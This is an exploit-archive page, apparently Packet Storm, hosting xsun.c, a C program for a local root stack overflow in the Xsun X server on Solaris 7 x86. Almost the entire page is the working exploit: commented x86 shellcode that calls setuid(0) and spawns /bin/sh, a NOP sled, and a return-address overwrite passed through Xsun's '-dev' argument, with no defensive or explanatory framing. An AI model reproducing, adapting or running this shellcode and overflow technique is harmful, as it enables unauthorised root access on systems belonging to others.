exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

xsun.c

xsun.c
Posted Apr 25, 2000
Authored by Anathema | Site hack.co.za

xsun.c is a Solaris 7 x86 local root stack overflow for /usr/openwin/bin/Xsun.

tags | exploit, overflow, x86, local, root
systems | solaris
SHA-256 | 8af8334ae766a801bf8d4fc9e432e34370f3f1ad1621d0fed7d083f188ac984f

xsun.c

Change Mirror Download
/*
* PRIVATE. DO NOT DISTRIBUTE.
*
* Xsun (solaris 7 x86) local root stack overflow.
* by anathema <anathema@hack.co.za>
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define RETPOS 3217
#define OFFSET 6000

char c0de[] =
/* main: */
"\xeb\x0a" /* jmp ahead */
/* a_lcall: */
"\x9a\x78\x78\x78\x5c\x07\x78" /* lcall */
"\xc3" /* ret */
/* jmp_0: */
"\xeb\x05" /* jmp start_0 */
/* ahead: */
"\xe8\xf9\xff\xff\xff" /* call jmp_0 */
/* start_0: */ /* setuid(0); - yes, this is necessary */
"\x5e" /* popl %esi */
"\x2b\xc0" /* subl %eax, %eax */
"\x88\x46\xf7" /* movb %al, 0xfffffff7(%esi) */
"\x89\x46\xf2" /* movl %eax, 0xfffffff2(%esi) */
"\x50" /* pushl %eax */
"\xb0\x17" /* movb $0x17, %al */
"\xe8\xe0\xff\xff\xff" /* call a_lcall */
"\xeb\x1f" /* jmp callz */
/* start: */ /* execve /bin/sh */
"\x5e" /* popl %esi */
"\x8d\x1e" /* leal (%esi), %ebx */
"\x89\x5e\x0b" /* movl %ebx, 0x0b(%esi) */
"\x2b\xc0" /* subl %eax, %eax */
"\x88\x46\x19" /* movb %al, 0x19(%esi) */
"\x89\x46\x14" /* movl %eax, 0x14(%esi) */
"\x89\x46\x0f" /* movl %eax, 0x0f(%esi) */
"\x89\x46\x07" /* movl %eax, 0x07(%esi) */
"\xb0\x3b" /* movb $0x3b, %al */
"\x8d\x4e\x0b" /* leal 0x0b(%esi), %ecx */
"\x51" /* pushl %ecx */
"\x51" /* pushl %ecx */
"\x53" /* pushl %ebx */
"\x50" /* pushl %eax */
"\xeb\x18" /* jmp lcall */
/* callz: */
"\xe8\xdc\xff\xff\xff" /* call start */
"\x2f\x62\x69\x6e\x2f\x73\x68" /* /bin/sh */
"\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03"
"\x9a\x04\x04\x04\x04\x07\x04"; /* lcall */

int
main(int argc, char **argv)
{
u_char buf[8192] = {0};
u_long addr = &addr;
int ret = RETPOS, i = 0;

fprintf(stderr, "Xsun local root overflow, solaris 7 x86\n"
"Copyright (c) anathema <anathema@box.co.uk>\n\n");

if (argc > 1) addr += atoi(argv[1]);
else addr += OFFSET;
fprintf(stderr, "-> 0x%lx\n", addr);

buf[0] = ':';
memset(buf + 1, 0x90, ret);
memcpy(buf + ret - strlen(c0de), c0de, strlen(c0de));

buf[ret++] = (addr & 0xff);
buf[ret++] = (addr >> 8) & 0xff;
buf[ret++] = (addr >> 16) & 0xff;
buf[ret++] = (addr >> 24) & 0xff;

execl("/usr/openwin/bin/Xsun", "Xsun", "-dev", buf, NULL);
perror("execl");
}

/* EOF */
/* www.hack.co.za */
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close